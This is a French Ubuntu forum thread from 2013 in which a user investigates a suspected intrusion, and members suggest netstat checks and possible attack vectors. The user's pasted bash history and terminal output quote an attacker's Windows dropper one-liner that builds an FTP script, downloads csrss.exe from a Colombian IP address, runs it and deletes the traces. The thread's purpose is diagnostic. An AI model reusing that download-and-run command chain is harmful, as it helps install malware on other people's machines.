Contenu | Rechercher | Menus

Annonce

Si vous rencontrez des soucis à rester connecté sur le forum (ou si vous avez perdu votre mot de passe) déconnectez-vous et reconnectez-vous depuis cette page, en cochant la case "Me connecter automatiquement lors de mes prochaines visites".
Test de l'ISO d'Ubuntu francophone : nous avons besoin de testeurs pour la version francophone d'Ubuntu 14.04. Liens et informations ici.

#1 Le 27/02/2013, à 11:14

solho

Intrusion?

Bonjour à tous,

Je viens vers vous pour savoir si mon PC n'aurait pas été "visité" à l'insu de mon plein gré...

Le Contexte:

Mon PC s'allume automatiquement vers 7h, puis lance la session Ubuntu 12.10( connection automatique au démarrage). Les progs qui se lancent au démarrage sont Dropbox, cairo-dock, et ce matin le gestionnaire de MàJ (je ne parle pas des services et autres que je ne connais pas).

Ce qui m'ennuie, c'est qu'avec cairo-dock, j'ai une petite fenêtre de terminal qui s'affiche et qui contenait ces lignes ce matin, au lieu de l'habituel 'solho@solho-V-M4A3000E:~$':

[5] 4004
[6] 4005
[7] 4006
ftp: s: unknown option
Commande 'del' non trouvée, vouliez-vous dire :
Commande 'del' non trouvée, vouliez-vous dire :
 La commande 'mdel' du paquet 'mtools' (main)
 La commande 'delp' du paquet 'fp-utils-2.6.0' (universe)
 La commande 'wdel' du paquet 'wput' (universe)
 La commande 'el' du paquet 'oneliner-el' (universe)
 La commande 'mdel' du paquet 'mtools' (main)
csrss.exe : commande introuvable
 La commande 'delp' du paquet 'fp-utils-2.6.0' (universe)
 La commande 'tel' du paquet 'orville-write' (universe)
 La commande 'wdel' du paquet 'wput' (universe)
 La commande 'deal' du paquet 'deal' (universe)
 La commande 'el' du paquet 'oneliner-el' (universe)
 La commande 'hdel' du paquet 'hfsutils' (main)
 La commande 'tel' du paquet 'orville-write' (universe)
 La commande 'bel' du paquet 'belier' (universe)
 La commande 'deal' du paquet 'deal' (universe)
 La commande 'qdel' du paquet 'torque-client' (universe)
 La commande 'hdel' du paquet 'hfsutils' (main)
 La commande 'qdel' du paquet 'gridengine-client' (universe)
 La commande 'bel' du paquet 'belier' (universe)
 La commande 'qdel' du paquet 'slurm-llnl-torque' (universe)
 La commande 'qdel' du paquet 'torque-client' (universe)
 La commande 'qdel' du paquet 'torque-client-x11' (universe)
 La commande 'qdel' du paquet 'gridengine-client' (universe)
 La commande 'qdel' du paquet 'slurm-llnl-torque' (universe)
del : commande introuvable
 La commande 'qdel' du paquet 'torque-client-x11' (universe)
del : commande introuvable
[2]   Fini                    echo open 190.24.211.230 10699 >> eq
[3]   Fini                    echo user 18653 9875 >> eq
[2]   Fini                    echo open 190.24.211.230 10699 >> eq
[3]   Fini                    echo user 18653 9875 >> eq
[4]   Fini                    echo get csrss.exe >> eq
[5]   Fini                    echo quit >> eq
[6]-  Termine 1               ftp -n -s:eq
solho@solho-V-M4A3000E:~$ [2]   Fini                    echo open 190.24.211.230 10699 >> eq

[1]-  Termine 127             del eq
[7]+  Termine 127             csrss.exe
solho@solho-V-M4A3000E:~$ 

Je ne fais pas de ftp consciemment, hormis Dropbox, je ne vois pas...

Une recherche sur l'IP me mêne en Colombie, chez "Corporativos24211-230.etb.net.co"??? et
Informations relevées Le 27-02-2013 à 08:17:09
Zone Géographique : Amérique Latine et Iles des Caraïbes
Pays de Connexion : COLOMBIA 
Ville de Connexion : Indéterminé
FAI : Inconnu
Réseau : Indéterminé

De plus csrss.exe etant plutot windowsien, je ne vois pas ce qu'il vient faire ici... J'ai bien un autre PC  XP branché sur Ubuntu via reminna mais je lance la connection manuellement et elle n'était pas lancée à ce moment...


Mes Questions:

Qu'est-ce que c'est que ce truc???
Est-ce grave, Docteur?
AI-je une grosse faille de sécurité sur mon PC?

PS: je ne relance pas le PC malgré mise à jour, si quelqu'un voudrait des logs particuliers.

Merci d'avance pour votre aide et éclaircissements

Dernière modification par solho (Le 27/02/2013, à 11:15)


Don't Worry... Be Linux!
Ubuntu 10.10 & 11.04
quelques mémentos.

Hors ligne

#2 Le 27/02/2013, à 11:48

pires57

Re : Intrusion?

netstat -tanu 

te donnera quelque infos. essaye de le lancer sans programme qui utilise le réseau (skype, firefox ... )


Utilisateur d'Archlinux, Ubuntu et Kali Linux
Administrateur système et réseau spécialisé Linux.

En ligne

#3 Le 27/02/2013, à 12:21

solho

Re : Intrusion?

Merci de te pencher sur ce problème et de me donner quelques pistes d'investigations... Commande lancée seulement avec dropbox et Remmina, le gestionnaire de MàJ n'est pas fermé non plus.

solho@solho-V-M4A3000E:~$ netstat -tanu
Connexions Internet actives (serveurs et établies)
Proto Recv-Q Send-Q Adresse locale          Adresse distante        Etat      
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN     
tcp        0      0 127.0.1.1:53            0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:17500           0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN     
tcp        1      0 192.168.1.3:39571       91.189.89.144:80        CLOSE_WAIT 
tcp        0      0 192.168.1.3:42421       173.194.45.41:443       TIME_WAIT  
tcp        0      0 192.168.1.3:32816       192.168.1.4:5900        TIME_WAIT  
tcp        0      0 192.168.1.3:39433       199.47.216.147:80       ESTABLISHED
tcp        0      0 192.168.1.3:48387       173.194.78.125:5222     TIME_WAIT  
tcp        0      0 192.168.1.3:54720       192.168.1.4:17500       ESTABLISHED
tcp6       0      0 :::5800                 :::*                    LISTEN     
tcp6       0      0 :::139                  :::*                    LISTEN     
tcp6       0      0 :::5900                 :::*                    LISTEN     
tcp6       0      0 :::22                   :::*                    LISTEN     
tcp6       0      0 ::1:631                 :::*                    LISTEN     
tcp6       0      0 :::445                  :::*                    LISTEN     
udp        0      0 127.0.1.1:53            0.0.0.0:*                          
udp        0      0 192.168.1.255:137       0.0.0.0:*                          
udp        0      0 192.168.1.3:137         0.0.0.0:*                          
udp        0      0 0.0.0.0:137             0.0.0.0:*                          
udp        0      0 192.168.1.255:138       0.0.0.0:*                          
udp        0      0 192.168.1.3:138         0.0.0.0:*                          
udp        0      0 0.0.0.0:138             0.0.0.0:*                          
udp        0      0 0.0.0.0:48199           0.0.0.0:*                          
udp        0      0 0.0.0.0:17500           0.0.0.0:*                          
udp        0      0 0.0.0.0:5353            0.0.0.0:*                          
udp6       0      0 :::41799                :::*                               
udp6       0      0 :::5353                 :::*                               
solho@solho-V-M4A3000E:~$ 

Les IP hors réseau local semble correspondre à Dropbox et Google inc., rien de suspect à priori...
Je vais essayer de voir si je peux retrouver l'historique du terminal de Cairo-dock, car je ne retrouve pas d'autre commandes que celle que j'ai pu taper dans Terminal en faisant la flèche "up"...


Don't Worry... Be Linux!
Ubuntu 10.10 & 11.04
quelques mémentos.

Hors ligne

#4 Le 27/02/2013, à 12:29

Le grand Rorh Sha

Re : Intrusion?

Shalut.

Ça ressemble à quelqu'un qui voudrait infecter un PC Windows à distance, mais comment aurait-il pu avoir un accès à une machine Linux sans le savoir ?


▛▜ ▛▜ ▛▜ ▙▟   ▐▀ ▙▟ ▛▜
▌▚ ▙▟ ▌▚ ▛▜   ▄▌ ▛▜ ▛▜

Hors ligne

#5 Le 27/02/2013, à 12:36

J5012

Re : Intrusion?

le compte dropbox pourrait avoir ete compromis ? si le win xp demarre manuellement y a laisse des traces, cela aurait pu laisser penser a "l'attaquant" que c'etait la machine principale ...

Hors ligne

#6 Le 27/02/2013, à 12:44

solho

Re : Intrusion?

Bon, on va peut-être y voir plus clair, je viens de trouver et lancer la commande "history":

solho@solho-V-M4A3000E:~$ history
    1  papsd machinarium
    2  padsp machinarium
    3  fsdisk -l
    4  fdisk -l
    5  sudo fdisk -l
    6  sudo add-apt-repository ppa:webupd8team/haguichi && sudo apt-get update && sudo apt-get install haguichi
    7  open-ssh
    8  openssh
    9  ssh
   10  open_ssh config
   11  open-ssh
   12  Open-ssh
   13  OpenSSH
   14  sshd
   15  sudo apt-get install openssh-server
   16  haguichi
   17  configure hamachi
   18  hamachi
   19  hamachi leave
   20  hamachi logoff
   21  hamachi logon
   22  hamachi
   23  hamachi command
   24  hamachi join 143-610-542
   25  hamachi do-join 143-610-542
   26  hamachi logoff
   27  sudo apt-get install chkconfig
   28  sudo apt-get -f install chkconfig
   29  man apt-get
   30  ape-get search chkconfig
   31  apt-get search chkconfig
   32  apt-get --search chkconfig
   33  man apt-get
   34  sudo testdisk
   35  sudo apt-get install testdisk
   36  sudo testdisk
   37  sudo add-apt-repository ppa:cairo-dock-team/ppa
   38  sudo apt-get update
   39  sudo apt-get install cairo-dock cairo-dock-plug-ins
   40  exit
   41  toonloop
   42  man ffmpeg
   43  exit
   44  sudo apt-get install mixxx
   45  exit
   46  htop
   47  top
   48  libreoffice
   49  sudo apt-get install htop
   50  htop
   51  clear
   52  dir
   53  sudo chown -R solho:solho /Dropbox
   54  sudo chown -R solho:solho :home/solho/Dropbox
   55  sudo chown -R solho:solho /home/solho/Dropbox
   56  clear
   57  sudo haltnow
   58  sudo halt
   59  %systemroot%\system32\cmd.exe
   60  del eq&echo open 190.24.211.230 10699 >> eq&echo user 18653 9875 >> eq &echo get csrss.exe >> eq &echo quit >> eq &ftp -n -s:eq &csrss.exe &del eq
   61  history
solho@solho-V-M4A3000E:~$ 

Bien, jusqu'à n°58, il y a de forte chance que ce soit mon oeuvre, par contre ensuite...


Don't Worry... Be Linux!
Ubuntu 10.10 & 11.04
quelques mémentos.

Hors ligne

#7 Le 27/02/2013, à 12:49

SODⒶ

Re : Intrusion?

Salut, y aurait pas un kévin qui aurait eu un accès physique à ta machine ?


Le sacré n'est fait que pour qu'on lui pisse dessus, qu'on lui crache dessus, qu'on le brûle et qu'on le rende kitch et mercantile ! Les idoles ne sont là que pour qu'on les renverse ! yikes Le passé n'est fait que pour amuser quelques historiens et pour être manipulé, tordu, vendu par les autres !

En ligne

#8 Le 27/02/2013, à 13:30

pires57

Re : Intrusion?

Salut, y aurait pas un kévin qui aurait eu un accès physique à ta machine ?

tu m'as bien fait rire la ^^


Utilisateur d'Archlinux, Ubuntu et Kali Linux
Administrateur système et réseau spécialisé Linux.

En ligne

#9 Le 27/02/2013, à 13:35

tiramiseb

Re : Intrusion?

À première vue, il semblerait que "quelqu'un" ait réussi à faire exécuter des commandes locales sur ton ordinateur, en croyant que c'est un Windows, ces commandes exécutant un programme chelou téléchargé en FTP sur un serveur en Colombie.

Sa tentative de faire tourner son ".exe" a échoué c'est sûr, par contre il est rentré d'une manière ou d'une autre.

Peux-tu exécuter la commande suivante ?

sudo netstat -tlnpu

Sébastien Maccagnoni-Munch - administrateur Linux depuis le XXème siècle
Consultant informatique indépendant - http://www.smm-informatique.fr
Geek et tout plein d'autres choses - http://www.tiramiseb.fr

Hors ligne

#10 Le 27/02/2013, à 15:58

SODⒶ

Re : Intrusion?

pires57 a écrit :

Salut, y aurait pas un kévin qui aurait eu un accès physique à ta machine ?

tu m'as bien fait rire la ^^

Mine de rien, pourquoi pas ?

C'est plus facile que de d'avoir un accès à distance, surtout sur une machine qui s'allume toute seule.

Un type qui obtient un accès ssh à une machine sans savoir que c'est du Linux puis qui tape des commandes DOS, j'y crois moyennement.

Pour moi, le petit cousin en vacances qui voit le PC de tonton allumé et qui suit le dernier tuto de hacker news mag, c'est possible.

On peut aussi envisager une clé USB avec un autorun lancé par wine. Ou encore une pièce-jointe vérolée.


Le sacré n'est fait que pour qu'on lui pisse dessus, qu'on lui crache dessus, qu'on le brûle et qu'on le rende kitch et mercantile ! Les idoles ne sont là que pour qu'on les renverse ! yikes Le passé n'est fait que pour amuser quelques historiens et pour être manipulé, tordu, vendu par les autres !

En ligne

#11 Le 27/02/2013, à 17:05

pires57

Re : Intrusion?

On peut aussi envisager une clé USB avec un autorun lancé par wine. Ou encore une pièce-jointe vérolée.

Effectivement, c'est une hypothèse.
Pour l'autre j'y crois moyen, faut être abruti pour ne pas se rendre compte que le système n'est pas sous windows....


Utilisateur d'Archlinux, Ubuntu et Kali Linux
Administrateur système et réseau spécialisé Linux.

En ligne

#12 Le 27/02/2013, à 19:08

solho

Re : Intrusion?

Re... Excusez mon retard, mais boulot boulot avant tout...

Bien, je clarifie un peu les chose, les 2 pc sont dans un batiment d'élevage, et aucun "Kevin" n'est passé par là (aucune trace sur cam ip) en dehors des heures d'ouverture...

@tiramiseb, les résultats de la commande

solho@solho-V-M4A3000E:~$ sudo netstat -tlnpu
[sudo] password for solho: 
Connexions Internet actives (seulement serveurs)
Proto Recv-Q Send-Q Adresse locale          Adresse distante        Etat       PID/Program name
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      978/smbd        
tcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN      1964/vino-server
tcp        0      0 127.0.1.1:53            0.0.0.0:*               LISTEN      1433/dnsmasq    
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      981/sshd        
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      1063/cupsd      
tcp        0      0 0.0.0.0:17500           0.0.0.0:*               LISTEN      1997/dropbox    
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      978/smbd        
tcp6       0      0 :::5800                 :::*                    LISTEN      1964/vino-server
tcp6       0      0 :::139                  :::*                    LISTEN      978/smbd        
tcp6       0      0 :::5900                 :::*                    LISTEN      1964/vino-server
tcp6       0      0 :::22                   :::*                    LISTEN      981/sshd        
tcp6       0      0 ::1:631                 :::*                    LISTEN      1063/cupsd      
tcp6       0      0 :::445                  :::*                    LISTEN      978/smbd        
udp        0      0 127.0.1.1:53            0.0.0.0:*                           1433/dnsmasq    
udp        0      0 192.168.1.255:137       0.0.0.0:*                           1571/nmbd       
udp        0      0 192.168.1.3:137         0.0.0.0:*                           1571/nmbd       
udp        0      0 0.0.0.0:137             0.0.0.0:*                           1571/nmbd       
udp        0      0 192.168.1.255:138       0.0.0.0:*                           1571/nmbd       
udp        0      0 192.168.1.3:138         0.0.0.0:*                           1571/nmbd       
udp        0      0 0.0.0.0:138             0.0.0.0:*                           1571/nmbd       
udp        0      0 0.0.0.0:48199           0.0.0.0:*                           1025/avahi-daemon: 
udp        0      0 0.0.0.0:17500           0.0.0.0:*                           1997/dropbox    
udp        0      0 0.0.0.0:5353            0.0.0.0:*                           1025/avahi-daemon: 
udp6       0      0 :::41799                :::*                                1025/avahi-daemon: 
udp6       0      0 :::5353                 :::*                                1025/avahi-daemon: 
solho@solho-V-M4A3000E:~$ 

Normalement, ma box fait office de firewall, j'ai fait les reglages pour pouvoir me connecter à distance via mon smartphone (pc xp, cam ip, et mais je n'y arrive plus depuis que j'ai changé mon smartphone, pc linux via open ssh )


Don't Worry... Be Linux!
Ubuntu 10.10 & 11.04
quelques mémentos.

Hors ligne

Haut de page ↑